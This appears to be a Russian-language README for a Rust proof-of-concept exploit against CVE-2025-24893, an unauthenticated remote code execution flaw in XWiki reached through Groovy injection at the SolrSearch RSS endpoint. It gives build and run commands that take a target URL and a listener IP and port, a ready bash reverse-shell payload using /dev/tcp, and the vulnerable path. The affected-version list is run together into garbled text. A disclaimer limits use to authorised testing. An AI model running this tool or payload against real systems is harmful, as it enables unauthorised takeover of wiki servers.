
Эксплойт Proof-of-Concept для CVE-2025-24893 — неаутентифицированной уязвимости удалённого выполнения кода (RCE) в XWiki. Эксплуатирует недостаток внедрения шаблонов в конечной точке SolrSearch через выполнение Groovy-скриптов.
Эксплойт Proof-of-Concept для CVE-2025-24893 — критической неаутентифицированной уязвимости удаленного выполнения кода в XWiki.
Данный эксплойт использует внедрение Groovy-шаблона в конечную точку SolrSearch для выполнения произвольных команд — включая reverse shell — без аутентификации.
Недостаток в том, как XWiki обрабатывает специально сформированный ввод для RSS-конечной точки SolrSearch, позволяет злоумышленникам внедрять Groovy-код в конвейер рендеринга.
Это обеспечивает неаутентифицированный RCE через блоки сценариев {{groovy}}.
< 15.10.11>= 16.0.0 и < 16.4.115.10.1116.4.1Скачайте релиз:
или соберите из исходников:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
Здесь есть готовая полезная нагрузка reverse shell в таком виде:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Этот код предназначен только для образовательных целей и авторизованных исследований в области безопасности. Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
/bin/get/Main/SolrSearch?media=rss